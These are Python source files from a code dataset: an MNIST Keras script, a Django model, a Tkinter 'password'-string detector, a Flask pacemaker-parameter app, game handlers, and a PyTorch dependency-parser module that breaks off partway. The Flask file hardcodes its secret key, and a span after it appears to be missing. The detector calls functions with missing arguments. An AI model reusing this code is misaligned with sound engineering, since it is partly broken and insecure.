Dropout(0.3)(x)\r\nx = Dense(n_hidden_2, activation='relu', name = \"Hidden_Layer_2\")(x)\r\nx = Dropout(0.3)(x)\r\nx = Dense(n_hidden_3, activation='relu', name = \"Hidden_Layer_3\")(x)\r\nx = Dropout(0.3)(x)\r\nx = Dense(n_hidden_4, activation='relu', name = \"Hidden_Layer_4\")(x)\r\nx = Dropout(0.3)(x)\r\nx = Dense(n_hidden_5, activation='relu', name = \"Hidden_Layer_5\")(x)\r\noutput = Dense(num_digits, activation='softmax', name = \"Output_Layer\")(x)\r\n\r\nmodel = Model(Inp, output)\r\nmodel.summary()\r\n\r\n# hyperparameters\r\nlearning_rate = 0.1\r\ntraining_epochs = 50\r\nbatch_size = 100\r\nsgd = optimizers.SGD(lr=learning_rate)\r\n\r\n# We rely on the plain vanilla Stochastic Gradient Descent as our optimizing methodology\r\n#model.compile(loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy'])\r\n\r\n#history1 = model.fit(X_train, y_train, batch_size = batch_size, epochs = training_epochs, verbose = 2, validation_data=(X_cv, y_cv))\r\n\r\n# train\r\nadam = keras.optimizers.Adam(lr=learning_rate)\r\nmodel2 = Model(Inp, output)\r\n\r\nmodel2.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\r\n\r\nhistory2 = model2.fit(X_train, y_train,batch_size = batch_size, epochs = training_epochs, verbose = 2, validation_data=(X_cv, y_cv))\r\n\r\n# test\r\ntest_pred = pd.DataFrame(model2.predict(X_test, batch_size=200))\r\ntest_pred = pd.DataFrame(test_pred.idxmax(axis = 1))\r\ntest_pred.index.name = 'ImageId'\r\ntest_pred = test_pred.rename(columns = {0: 'Label'}).reset_index()\r\ntest_pred['ImageId'] = test_pred['ImageId'] + 1\r\n\r\ntest_pred.head() \r\n\r\n#csv output\r\ntest_pred.to_csv('mnist_submission.csv', index = False)","sub_path":"kaggle_mnist.py","file_name":"kaggle_mnist.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"503018260","text":"# models.py ---\n#\n# Filename: models.py\n# Author: Louise \n# Created: Thu Apr 30 22:49:36 2020 (+0200)\n# Last-Updated: Sat May 2 21:41:22 2020 (+0200)\n# By: Louise \n#\n\"\"\"\nRegister the only model in the app, SavedProduct.\n\"\"\"\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\nfrom products.models import Product\n\nclass SavedProduct(models.Model):\n \"\"\"\n SavedProduct maps a user to several products\n that were found by the search engine to be\n substitutes.\n \"\"\"\n orig_product = models.ForeignKey(Product,\n on_delete=models.CASCADE,\n related_name='original_savedproducts')\n sub_product = models.ForeignKey(Product,\n on_delete=models.CASCADE,\n related_name='replaced_savedproducts')\n user = models.ForeignKey(User,\n on_delete=models.CASCADE,\n related_name='saved_products')\n\n class Meta:\n \"\"\"\n Add constraints to guarantee uniqueness of user and sub_product.\n By that, I mean that a given user can save onle one time a sub_product.\n \"\"\"\n constraints = [\n models.UniqueConstraint(fields=[\"user\", \"sub_product\"],\n name=\"each_product_saved_only_once\")\n ]\n","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"645002300","text":"from tkinter import *\r\nfrom tkinter import filedialog as fd\r\nimport numpy as np\r\nimport random\r\n\r\n\r\ndef sigmoid(x):\r\n \"\"\"сигмоидальная функция, работает и с числами, и с векторами (поэлементно)\"\"\"\r\n return 1 / (1 + np.exp(-x))\r\n\r\ndef sigmoid_prime(x):\r\n \"\"\"производная сигмоидальной функции, работает и с числами, и с векторами (поэлементно)\"\"\"\r\n return sigmoid(x) * (1 - sigmoid(x))\r\n\r\ndef ExsamplesCreator():\r\n # text.insert('end','Процесс обучения нейронной сети...')\r\n f=open(text1.get())\r\n mass=f.readlines()\r\n # wordText=''\r\n mass = [line.rstrip() for line in mass]\r\n exsamples=[]\r\n \r\n answerOfExsamples=[]\r\n for i in range(len(mass)):\r\n exsamples.append([])\r\n answerOfExsamples.append([]) \r\n answerOfExsamples[i].append(int(mass[i][-2]))\r\n mass[i]=mass[i][1:-4]\r\n for j in range(0,len(mass[i]),2):\r\n exsamples[i].append(int(mass[i][j]))\r\n exsamples=np.array(exsamples)\r\n answerOfExsamples=np.array(answerOfExsamples)\r\n print(answerOfExsamples)\r\n print(exsamples)\r\n return(exsamples, answerOfExsamples)\r\n\r\n\r\n\r\ndef WeightCreator():\r\n W1=[]\r\n W2=[]\r\n bians1=[]\r\n bians2=[]\r\n for i in range(64):\r\n W1.append([])\r\n for j in range(8):\r\n W1[i].append(round(random.uniform(-0.5,0.5),3))\r\n # print(W[0][i])\r\n W2.append([])\r\n bians1.append([])\r\n for i in range(64):\r\n W2[0].append(round(random.uniform(-0.5,0.5),3))\r\n bians1[0].append(round(random.uniform(-0.5,0.5),3))\r\n bians2.append(round(random.uniform(-0.5,0.5),3))\r\n bians1=np.array(bians1)\r\n bians2=np.array(bians2)\r\n W1=np.array(W1)\r\n W2=np.array(W2)\r\n # print(W1,W2)\r\n return(W1,W2,bians1,bians2)\r\n\r\ndef LearningFirstLayer(exsample,W1,bians1):\r\n summator=exsample.dot(W1.T)+bians1[0]\r\n # print(summator)\r\n active=sigmoid(summator)\r\n # print(active)\r\n return(active,summator)\r\n\r\ndef LearningSecondLayer(active,W2,bians2):\r\n summator=active.dot(W2.T)+bians2[0]\r\n #print(summator)\r\n answer=sigmoid(summator)\r\n # print('ans',answer)\r\n return(answer,summator)\r\n\r\ndef ErrorCorrection(d,W2):\r\n D2=d*W2\r\n # print('W2',W2)\r\n# print(W2.shape)\r\n return(D2)\r\n\r\ndef WeightCorrection(vector,W1,W2,\r\n bians1,bians2,\r\n D2,summatorFunction,\r\n summatorFunction2,\r\n activeFunction,d):\r\n #print('len',len(W1))\r\n for i in range(len(W1)):\r\n # print('len',len(W1))\r\n # input()\r\n bians1[0][i]=bians1[0][i]+D2[0][i]*sigmoid_prime(summatorFunction[i])*a\r\n for j in range(len(W1[i])):\r\n W1[i][j]=W1[i][j]+D2[0][i]*sigmoid_prime(summatorFunction[i])*vector[j]*a #x\r\n for i in range(len(W2[0])):\r\n W2[0][i]=W2[0][i]+d*sigmoid_prime(summatorFunction2[0])*activeFunction[i]*a\r\n bians2[0]=bians2[0]+d*sigmoid_prime(summatorFunction2[0])*a\r\n return(W1,W2,bians1,bians2)\r\n \r\n\r\n\r\n\r\ndef ButtonLearn():\r\n # text.insert('end','Процесс обучения нейронной сети...')\r\n findWord='password' \r\n a=0.1\r\n exsamples,answerOfExsamples = ExsamplesCreator()\r\n #print(exsamples,answerOfExsamples)\r\n W1,W2,bians1,bians2 = WeightCreator()\r\n #print('bians',bians2)\r\n\r\n #input()\r\n # text.insert('end','Процесс обучения нейронной сети...')\r\n for j in range(1000):\r\n print(j)\r\n for i in range(len(exsamples)):\r\n \r\n activeFunction,summatorFunction = LearningFirstLayer(exsamples[i],\r\n W1,bians1)\r\n answerOfNet,summatorFunction2 = LearningSecondLayer(activeFunction,\r\n W2,bians2)\r\n d = answerOfExsamples[i]-answerOfNet\r\n D2 = ErrorCorrection(d,W2)\r\n\r\n # print('D2',D2)\r\n #print(D2.shape)\r\n # print(W1)\r\n W1,W2,bians1,bians2=WeightCorrection(exsamples[i],W1,W2,\r\n bians1,bians2,D2,\r\n summatorFunction,\r\n summatorFunction2,\r\n activeFunction,d)\r\n text.insert('end','Искусственная нейронная сеть успешно обучена \\n')\r\n # print(W1)\r\n\r\n\r\ndef similar(text):\r\n #if not len(first) == len(second):\r\n # return False\r\n word='password' \r\n mass=[]\r\n for i in range(len(text)-len(word)):\r\n find=text[i:i+len(word)]\r\n # print(find)\r\n if len(find) - sum(l1==l2 for l1, l2 in zip(find, word)) < 5:\r\n #return False\r\n mass.append(text[i:i+len(word)])\r\n return (mass)\r\n\r\ndef ButtonAnalyze():\r\n f=open(text2.get(), encoding=\"utf-8\")\r\n f=f.readlines()\r\n codeText=''\r\n for i in range(len(f)):\r\n codeText+=f[i]\r\n #print(text)\r\n word='password'\r\n#mass=[]\r\n#for i in range(len(f)-len(word)):\r\n \r\n # mass.append(similar(f[i:i+len(word)]\r\n \r\n#print(f)\r\n massOfSimilarWords=similar(codeText)\r\n \r\n\r\n print(massOfSimilarWords)\r\n \r\n analyzingVector=[]\r\n for i in range(len(massOfSimilarWords)):\r\n analyzingVector.append([])\r\n print(massOfSimilarWords[i])\r\n for j in range(len(massOfSimilarWords[i])):\r\n # print(massOfSimilarWords[i])\r\n if massOfSimilarWords[i][j]==word[j]:\r\n # print(massOfSimilarWords[i][j],word[i])\r\n analyzingVector[i].append(1)\r\n else:\r\n #print(massOfSimilarWords[i][j],word[i])\r\n analyzingVector[i].append(0)\r\n analyzingVector=np.array(analyzingVector)\r\n print(analyzingVector)\r\n for i in range(len(analyzingVector)):\r\n activeFunction,summatorFunction = LearningFirstLayer(analyzingVector[0])\r\n answerOfNet,summatorFunction2 = LearningSecondLayer(activeFunction)\r\n print(answerOfNet)\r\n \r\n \r\n \r\n \r\ndef insertText1():\r\n file_name = fd.askopenfilename()\r\n f = open(file_name)\r\n s = f.read()\r\n text.insert('end','Обучающая выборка:\\n')\r\n text.insert('end', file_name+'\\n')\r\n # text.insert(1.0, s)\r\n text1.insert(0,file_name)\r\n f.close()\r\n\r\ndef insertText2():\r\n file_name = fd.askopenfilename()\r\n f = open(file_name)\r\n s = f.read()\r\n text.insert('end','Анализируемый код: \\n')\r\n text.insert('end', file_name + '\\n')\r\n text2.insert(0,file_name)\r\n f.close()\r\n\r\n\r\nfindWord='password' \r\na=0.1 \r\nroot = Tk()\r\nroot.geometry('400x400+360+200')\r\nroot.title('Text Generation')\r\ntext = Text(width=45, height=15)\r\ntext.place(x=10,y=130)\r\nscroll = Scrollbar(command=text.yview)\r\nscroll.place(x=370, y=130)\r\ntext.config(yscrollcommand=scroll.set)\r\nlabel1=Label(root,width=17, height=2,text='Обучающая выборка')\r\ntext1=Entry(root,bd=5,width=25)\r\ntext1.place(x=10,y=30)\r\nlabel1.place(x=8,y=4)\r\nlabel2=Label(root,width=13, height=2,text='Код программы')\r\nlabel2.place(x=8, y=65)\r\ntext2=Entry(root,bd=5,width=25)\r\ntext2.place(x=10, y = 90)\r\nb1 = Button(text=\"...\", command=insertText1)\r\nb1.place(x=180, y=30)\r\nb2 = Button(text=\"...\", command=insertText2)\r\nb2.place(x=180, y=90)\r\nbutton1=Button(text= 'LEARN',width=10, command=ButtonLearn)\r\nbutton1.place(x=230, y=30)\r\nbutton2=Button(text=\"ANALYZE\", width=10, command=ButtonAnalyze)\r\nbutton2.place(x=230, y=90)\r\nroot.mainloop()\r\n","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":7704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"535023488","text":"import json\nfrom flask import Flask, render_template, request, redirect, url_for, session\nimport sqlite3\nimport serial\nimport database as db\nimport utils\n#import serial_utils\nimport dummy_serial_utils as serial_utils\n\nparameter_ranges = {\n 'lower_rate_limit': {\"range\": [50, 90], \"type\": int},\n 'atrial_amplitude': {\"range\": [65, 75], \"type\": int},\n 'atrial_pulse_width': {\"range\": [1, 30], \"type\": int}, # ms\n 'atrial_sensitivity': {\"range\": [25, 100], \"type\": float},\n 'arp': {\"range\": [150, 500], \"type\": int},\n 'ventricle_amplitude': {\"range\": [65, 75], \"type\": int},\n 'ventricle_pulse_width': {\"range\": [1, 30], \"type\": int},\n 'ventricle_sensitivity': {\"range\": [25, 100], \"type\": float},\n 'vrp': {\"range\": [150, 500], \"type\": int},\n 'max_sens_rate': {\"range\": [50, 175], \"type\": int},\n 'activity_threshold': {\"range\": [0, 200], \"type\": int},\n 'reaction_time': {\"range\": [0, 200], \"type\": int},\n 'response_factor': {\"range\": [1, 20], \"type\": int},\n 'recovery_time': {\"range\": [0, 200], \"type\": int},\n 'fixed_av_delay': {'range': [70, 300], \"type\": int}\n}\n\n# Set up the server\napp = Flask(__name__)\napp.secret_key = b'!@#$RFBNKOI*&^%RESXCVBNKLOI*&^%ESXCVBNK= 10:\n return render_template('signup.html', signup_failed=True, error_msg=\"too many users registered\")\n if request.form['username'] and request.form['password']:\n try:\n db.create_user((request.form['username'], request.form['password']))\n return redirect(url_for('login'))\n except sqlite3.IntegrityError as e:\n print(e)\n return render_template('signup.html', signup_failed=True,\n error_msg=\"unsuccessful registration, try again\")\n return render_template('signup.html', signup_failed=True, error_msg=\"no username or password entered\")\n\n\n# If user navigates to /login (method == get), serve the login\n# page. If user is already logged in, redirect to /dcm\n\n# If user submits their login information (method == post),\n# check if the user's information is valid. If valid, send to the dcm page.\n# If not, send them back to the login page with a notification\n@app.route('/login', methods=['POST', 'GET'])\ndef login():\n if request.method == 'GET':\n if \"user\" not in session:\n return render_template('index.html',\n login_failed=\n False if 'login_failed' not in request.args\n else request.args['login_failed']\n )\n else:\n return redirect(url_for(\"dcm_view\"))\n\n if request.method == 'POST':\n\n # check if login input is valid\n user = utils.check_credentials(request.form['username'], request.form['password'])\n\n if user:\n session[\"device_id\"] = 0\n session[\"user\"] = user\n return redirect(url_for(\"dcm_view\"))\n else:\n return redirect(url_for('login', login_failed=True))\n\n\n@app.route('/logout', methods=['POST'])\ndef logout():\n session.pop(\"user\")\n session.pop(\"device_id\")\n return redirect(\"/\")\n\n\n@app.route('/connection_update', methods=['POST'])\ndef connect():\n session[\"serial_port\"] = request.form[\"serial_port\"]\n ser.port = session[\"serial_port\"]\n try:\n session['device_id'] = serial_utils.get_device_id(ser)\n except serial.serialutil.SerialException:\n session['device_id'] = None\n session[\"serial_port\"] = \"Failed To Connect\"\n return redirect(\"/dcm\")\n\n\n# Show the user the page with dcm settings. Clicking a different mode\n# shows a different submission form with the valid parameters (see dcm.html)\n@app.route('/dcm', methods=['GET'])\ndef dcm_view():\n if \"user\" not in session:\n return redirect(url_for(\"landing_page\"))\n else:\n device_id = None if \"device_id\" not in session else session[\"device_id\"]\n user_stored_params = db.get_user_params(session[\"user\"], device_id)\n submission_success = None if 'submission_success' not in request.args else request.args['submission_success']\n invalid_parameters = None if 'invalid_parameters' not in request.args else request.args['invalid_parameters']\n serial_port = \"None\" if \"serial_port\" not in session else session[\"serial_port\"]\n return render_template('dcm.html',\n device_id=device_id,\n user=session[\"user\"],\n stored_params=user_stored_params,\n submission_success=submission_success,\n invalid_parameters=invalid_parameters,\n serial_port=serial_port,\n parameter_ranges=parameter_ranges\n )\n\n\n# After submitting a form on the dcm page, the results are posted here.\n# The parameters are checked if they are within predefined valid ranges, and\n# if they are not, send the user a message with which parameters are out of the range.\n\n# TODO: Add serial communication to send the parameters sent to this method to simulink using ser.write()\n# TODO: Parameters are accessed with request.form[parameter]\n@app.route('/submit-params/', methods=['POST'])\ndef submit_params(mode):\n invalid_parameters = utils.check_invalid_parameters(request.form, mode, parameter_ranges)\n print(\"invalid_parameters\")\n print(invalid_parameters)\n if invalid_parameters or not session['device_id']:\n return redirect(url_for(\"dcm_view\",\n submission_success=False,\n invalid_parameters=invalid_parameters)\n )\n (parameters, parameter_dict) = utils.build_parameters(mode, request.form)\n db.create_parameters(parameters, session['user'], session['device_id'])\n\n try:\n if not serial_utils.set_device_params(ser, parameter_dict):\n raise serial.serialutil.SerialException\n except serial.serialutil.SerialException:\n session['device_id'] = None\n return redirect(url_for(\"dcm_view\",\n submission_success=False,\n invalid_parameters=invalid_parameters)\n )\n # TODO: This is where to put the serial communication\n print(request.form)\n\n return redirect(url_for(\"dcm_view\",\n submission_success=True,\n invalid_parameters=invalid_parameters)\n )\n\n\n@app.route('/get_egram_data', methods=['GET'])\ndef get_egram_data():\n egram_data = 0\n try:\n egram_data = serial_utils.receive_egram_transmission(ser)\n serial_success = 200\n except serial.serialutil.SerialException:\n serial_success = 500\n return app.response_class(\n response=json.dumps(\n {'status': serial_success, 'atrium': egram_data['atrium'], 'ventricle': egram_data['ventricle']}),\n mimetype='application/json'\n )\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"DCM-group1/src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"122870612","text":"#coding:utf8\r\n'''\r\nCreated on 2014-1-17\r\n\r\n@author: CC\r\n'''\r\n\r\nfrom app.game.core.GamersManager import GamersManager\r\n\r\ndef roleInfo(dynamicId,characterId):\r\n\t'''获取角色的状态栏信息\r\n\t@param userId: int 用户id\r\n\t@param characterId: 角色的id\r\n\t'''\r\n\tgamer=GamersManager().getGamerBydynamicId(dynamicId)\r\n\tif dynamicId!=gamer.getDynamicId():\r\n\t\treturn {'result':False,'message':\"角色不存在\"}\r\n\tgamerinfo=gamer.formatInfo()\r\n\tresponsedata={'result':True,'message':'','data':{'characterId':gamerinfo['id'],'rolename':gamerinfo['nickname'],'level':gamerinfo['level'],'exp':gamerinfo['exp'],'maxexp':gamerinfo['maxExp'],'gamecoin':gamerinfo['gamecoin'],'coin':gamerinfo['coin'],'energy':gamerinfo['energy'],'maxenergy':gamerinfo['energy'],'power':gamerinfo['power'],'photo':gamerinfo['photo'],'repute':gamerinfo['repute'],'trainpoint':gamerinfo['trainpoint'],'zenid':gamerinfo['zenid'],'tacticspoint':gamerinfo['tacticspoint']}}\r\n\treturn responsedata\r\n\r\ndef calPower(dynamicId,characterId):\r\n\t''''''\r\n\tgamer=GamersManager().getGamerBydynamicId(dynamicId)\r\n\tif dynamicId!=gamer.getDynamicId():\r\n\t\treturn {'result':False,'message':\"角色不存在\"}\r\n\tresult=gamer.CalPower()\r\n\treturn result\r\n","sub_path":"app/game/appinterface/roleinfo.py","file_name":"roleinfo.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"256015167","text":"import os\nimport typing\nfrom dataclasses import dataclass\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom module.dmv import DMVOptions\nfrom utils.functions import make_mask, cp_mask_merge\nfrom utils.common import *\n\n\n@dataclass\nclass NeuralMOptions:\n # MStepModel\n num_lex: int = 0 # in dmv, no need to distinguish lex and pos for l-ndmv\n num_lan: int = 1\n\n dim_pos_emb: int = 10\n dim_word_emb: int = 200\n dim_valence_emb: int = 10\n dim_direction_emb: int = 1\n dim_lan_emb: int = 5\n\n dim_hidden: int = 15\n dim_pre_out_decision: int = 5\n dim_pre_out_child: int = 12\n\n dropout: float = 0.2\n optimizer: str = \"adam\"\n lr: float = 0.01\n lr_decay_rate: float = 1.\n min_lr: float = 0.01\n\n encoder_mode: str = 'empty'\n encoder_lstm_dim_hidden: int = 200\n encoder_lstm_num_layers: int = 2\n encoder_lstm_dropout: float = 0.2\n\n use_pos_emb: bool = False\n use_word_emb: bool = False\n use_valence_emb: bool = False\n share_valence_emb: bool = False\n use_direction_emb: bool = False # if False, use diff linear for diff directions\n use_sentence_emb: bool = False\n use_lan_emb: bool = False\n\n freeze_word_emb: bool = False\n\n # if True, child_out_linear`s weight will be binded with POS emb and WORD emb(if available).\n # described in NDMV, L-NDMV.\n # if False, child_out_linear`s weight will be randomness\n use_emb_as_w: bool = False\n use_child_pos_emb: bool = False\n\n\nclass Encoder(nn.Module):\n def __init__(self, emb: nn.Embedding, is_pretrained_emb=False):\n super().__init__()\n self.emb = emb\n self.net = None\n self.reset_func = None\n self.out_dim = 0\n self.is_pretrained_emb = is_pretrained_emb\n if self.is_pretrained_emb and emb.weight.requires_grad:\n self._saved_emb = self.emb.weight.data.clone()\n else:\n self._saved_emb = None\n\n def forward(self, word_array, len_array):\n h = self.emb(word_array)\n h = self.net(h, len_array)\n return h\n\n def build_empty_encoder(self):\n def encode(h, len_array):\n return h\n\n def reset():\n return\n\n self.net = encode\n self.reset_func = reset\n self.out_dim = self.emb.weight.shape[1]\n\n def build_lstm_encoder(self, hidden_dim, num_layers, dropout):\n net = nn.LSTM(self.emb.weight.shape[1], hidden_dim // 2,\n num_layers, dropout=dropout, bidirectional=True)\n self.add_module('lstm_encoder', net)\n\n # noinspection PyTypeChecker\n def encode(h, len_array):\n batch_size, max_len, *_ = h.shape\n h = h.transpose(1, 0).contiguous()\n h = nn.utils.rnn.pack_padded_sequence(\n h, len_array, enforce_sorted=False)\n h = net(h)[0]\n h = nn.utils.rnn.pad_packed_sequence(h)[0]\n h = h.transpose(1, 0).contiguous()\n return h\n\n def reset():\n net.reset_parameters()\n\n self.net = encode\n self.reset_func = reset\n self.out_dim = hidden_dim\n\n def reset(self):\n assert self.reset_func is not None, 'reset is undefined'\n self.reset_func()\n if self._saved_emb is not None:\n self.emb.weight.data[:] = self._saved_emb\n else:\n self.emb.reset_parameters()\n\n def __call__(self, *args, **kwargs) -> typing.Any:\n return super().__call__(*args, **kwargs)\n\n\nclass NeuralM(nn.Module):\n def __init__(self, o: NeuralMOptions):\n super().__init__()\n self.o = o\n self.mode = o.e_step_mode\n self.use_direction_emb = o.use_direction_emb\n\n self.num_lex = o.num_lex\n self.num_pos = o.num_tag - self.num_lex\n self.cv = o.cv\n\n self.emb_dim = 0\n self.hidden_dim = o.dim_hidden\n\n if self.num_lex > 0:\n self.word_idx, self.pos_idx = None, None\n\n assert o.use_word_emb or o.use_pos_emb\n\n if o.use_word_emb:\n if hasattr(self.o, 'emb_path') and self.o.emb_path:\n word_emb = nn.Parameter(torch.tensor(np.load(self.o.emb_path), dtype=torch.float))\n word_emb.requires_grad = not o.freeze_word_emb\n else:\n word_emb = nn.Parameter(torch.empty(self.o.num_lex + 2, self.o.dim_word_emb))\n nn.init.normal_(word_emb)\n word_emb = nn.Embedding.from_pretrained(word_emb)\n self.word_encoder: Encoder = Encoder(word_emb)\n if o.encoder_mode == 'lstm':\n self.word_encoder.build_lstm_encoder(o.encoder_lstm_dim_hidden, o.encoder_lstm_num_layers,\n o.encoder_lstm_dropout)\n elif o.encoder_mode == 'empty':\n self.word_encoder.build_empty_encoder()\n else:\n raise ValueError(\"the encoder only supports (lstm, empty)\")\n self.emb_dim += self.word_encoder.out_dim\n else:\n self.word_encoder = None\n\n if o.use_sentence_emb:\n assert o.use_word_emb, 'if use sentence emb, must use word emb'\n self.emb_dim += self.word_encoder.out_dim\n\n if o.use_pos_emb:\n self.pos_encoder: Encoder = Encoder(nn.Embedding(self.num_pos, o.dim_pos_emb))\n self.pos_encoder.build_empty_encoder()\n self.emb_dim += self.pos_encoder.out_dim\n else:\n self.pos_encoder = None\n\n if o.use_lan_emb:\n assert o.num_lan > 1, 'meanless option'\n self.lan_emb = nn.Embedding(o.num_lan, o.dim_lan_emb)\n self.emb_dim += o.dim_lan_emb\n\n if o.use_valence_emb:\n if o.share_valence_emb and self.cv == 2:\n self.cv_emb = nn.Embedding(2, o.dim_valence_emb)\n self.dv_emb = self.cv_emb\n else:\n if o.share_valence_emb:\n print('share_valence_emb reset to False because need the same num of valence')\n self.cv_emb = nn.Embedding(self.cv, o.dim_valence_emb)\n self.dv_emb = nn.Embedding(2, o.dim_valence_emb)\n self.emb_dim += o.dim_valence_emb\n else:\n self.cv_emb, self.dv_emb = None, None\n\n # must be the last emb because here will init nn.\n if self.use_direction_emb:\n self.direction_emb = nn.Embedding(2, self.direction_dim)\n self.emb_dim += self.direction_dim\n self.emb_linear = nn.Linear(self.emb_dim, self.hidden_dim)\n self.left_right_linear = None\n else:\n self.direction_emb, self.emb_linear = None, None\n self.left_right_linear = nn.Linear(self.emb_dim, 2 * self.hidden_dim)\n\n self.decision_linear = nn.Linear(self.hidden_dim, o.dim_pre_out_decision)\n self.decision_out_linear = nn.Linear(o.dim_pre_out_decision, 2)\n\n if o.use_emb_as_w:\n w_dim = 0\n # if o.use_pos_emb:\n # w_dim += o.dim_pos_emb\n if o.use_word_emb:\n w_dim += o.dim_word_emb\n if self.o.dim_pre_out_child != w_dim:\n print(f\"overwrite o.dim_pre_out_child to {w_dim} because o.use_emb_as_w = True\")\n o.dim_pre_out_child = w_dim\n\n if hasattr(self.o, 'pos_emb_path') and self.o.pos_emb_path:\n self.pos_emb_out = nn.Parameter(torch.tensor(np.load(self.o.pos_emb_path), dtype=torch.float))\n else:\n self.pos_emb_out = nn.Parameter(torch.empty(self.num_pos, o.dim_pre_out_child))\n nn.init.normal_(self.pos_emb_out.data)\n\n self.child_linear = nn.Linear(self.hidden_dim, o.dim_pre_out_child)\n self.child_out_linear = None # see build_child_out_linear\n self.child_pos_emb = None\n else:\n self.child_linear = nn.Linear(self.hidden_dim, o.dim_pre_out_child)\n self.child_out_linear = nn.Linear(o.dim_pre_out_child, o.num_tag)\n\n self.activate = F.relu\n self.dropout = nn.Dropout(o.dropout)\n\n self.optimizer_name = o.optimizer\n self.lr = o.lr\n self.lr_decay = o.lr_decay_rate\n if o.optimizer == 'adam':\n self.optimizer = torch.optim.Adam(self.parameters(), lr=o.lr)\n elif o.optimizer == 'sgd':\n self.optimizer = torch.optim.SGD(self.parameters(), lr=o.lr)\n else:\n self.optimizer = None\n\n def forward(self, arrays, group_ids, traces=None):\n \"\"\"\n :param arrays:\n a dict which contains arrays. 'id' and 'len' is necessary.\n There are a series of use_X_emb in options to control the usage of arrays.\n :param group_ids:\n a array indicate word`s tag used in dmv, if num_lex=0,\n group_ids should be the same as pos_array .\n :param traces:\n a dict which contains traces.\n If given, forward in 'train' mode, or forward in 'predict' mode\n :return:\n \"\"\"\n len_array = arrays['len']\n batch_size = len(len_array)\n max_len = arrays['pos'].shape[1]\n\n to_expand = []\n if self.o.use_pos_emb:\n to_expand.append(self.pos_encoder(arrays['pos'], len_array))\n if self.o.use_word_emb:\n encoded_word = self.word_encoder(arrays['word'], len_array)\n to_expand.append(encoded_word)\n\n if self.o.use_sentence_emb:\n direction_splitted = encoded_word.view(batch_size, max_len, 2, -1)\n sentence = torch.cat([direction_splitted[torch.arange(batch_size), len_array - 1, 0, :],\n direction_splitted[:, 0, 1, :]], -1)\n to_expand.append(sentence)\n\n len_mask = make_mask(len_array, max_len)\n\n if traces is None:\n expanded, d, v, _ = self.prepare_decision(\n to_expand, len_mask, batch_size, max_len)\n decision_param = self.real_forward(\n expanded[:], d, v, True).reshape(batch_size, max_len, 2, 2, 2)\n\n if self.cv != 2:\n expanded, d, v, _ = self.prepare_trainsition(\n to_expand, len_mask, batch_size, max_len)\n h = self.real_forward(expanded, d, v, False)\n transition_param = self.transition_param_helper(group_ids, h, valid_direction=True)\n\n return decision_param, transition_param\n\n loss = torch.tensor(0., device='cuda')\n\n decision_trace = traces['decision']\n # decision_mask = torch.ones(decision_trace.shape, device='cuda', dtype=torch.bool)\n # decision_mask[:, 0, 0, :, GO] = 0\n # decision_mask[torch.arange(batch_size), len_array - 1, 1, :, GO] = 0\n decision_trace = decision_trace.view(-1)\n\n expanded, d, v, mask = self.prepare_decision(\n to_expand, len_mask, batch_size, max_len)\n h = self.real_forward(expanded[:], d, v, True).view(-1)\n loss += self.loss(h, decision_trace, mask) # & decision_mask.view(-1))\n\n transition_trace = traces['transition']\n # trace_mask = torch.ones(traces['transition'].shape, device='cuda', dtype=torch.bool)\n # for i in range(max_len):\n # trace_mask[:, i, :i + 1, 1] = 0\n # trace_mask[:, i, i:, 0] = 0\n transition_trace = transition_trace.view(-1)\n\n if self.cv != 2:\n expanded, d, v, mask = self.prepare_trainsition(\n to_expand, len_mask, batch_size, max_len)\n else:\n *_, mask = self.prepare_trainsition(to_expand,\n len_mask, batch_size, max_len, only_mask=True)\n h = self.real_forward(expanded, d, v, False)\n h = self.transition_param_helper(group_ids, h, valid_direction=False).view(-1)\n loss += self.loss(h, transition_trace, mask) # & trace_mask.view(-1))\n return loss\n\n def real_forward(self, emb_buffer, direction, valence, is_decision):\n emb_buffer.append(self.dv_emb(valence)\n if is_decision else self.cv_emb(valence))\n if self.use_direction_emb:\n emb_buffer.append(self.direction_emb(direction))\n h = torch.cat(emb_buffer, dim=-1)\n del emb_buffer\n\n h = self.dropout(h)\n if self.use_direction_emb:\n h = self.activate(self.emb_linear(h))\n else:\n left_right_h = self.activate(self.left_right_linear(h))\n left_h = left_right_h[:, :self.o.dim_hidden]\n right_h = left_right_h[:, self.o.dim_hidden:]\n left_h[direction == 1, :] = 0.\n right_h[direction == 0, :] = 0.\n h = left_h + right_h\n del left_h, right_h, left_right_h\n\n h = self.dropout(h)\n if is_decision:\n h = self.decision_out_linear(\n self.activate(self.decision_linear(h)))\n else:\n if self.o.use_emb_as_w:\n # w_pos = self.child_pos_emb(self.pos_idx)\n w_word = torch.cat(\n [self.pos_emb_out, self.word_encoder.emb(self.word_idx)])\n # w = torch.cat([w_pos, w_word], dim=1).T\n w = w_word.T\n h = torch.mm(self.activate(self.child_linear(h)), w)\n else:\n h = self.child_out_linear(self.activate(self.child_linear(h)))\n return torch.log_softmax(h, dim=-1)\n\n @staticmethod\n def loss(forward_out, target_count, mask):\n batch_loss = -torch.sum(target_count * forward_out * mask) / torch.sum(mask)\n return batch_loss\n\n @staticmethod\n def prepare_decision(arrays_to_expand, mask, batch_size, max_len):\n # arrays in arrays_to_expand should has shape (batch_size, hidden) or (batch_size, max_len, hidden)\n expanded = []\n for array in arrays_to_expand:\n array = array.view(batch_size, -1, 1, array.shape[-1])\n array = array.expand(-1, max_len, 4, -1)\n array = array.reshape(batch_size * max_len * 4, -1)\n expanded.append(array)\n\n direction_array = torch.zeros(\n batch_size * max_len, 2, 2, dtype=torch.long, device='cuda')\n direction_array[:, 1, :] = 1\n direction_array = direction_array.view(-1)\n\n valence_array = torch.zeros(\n batch_size * max_len * 2, 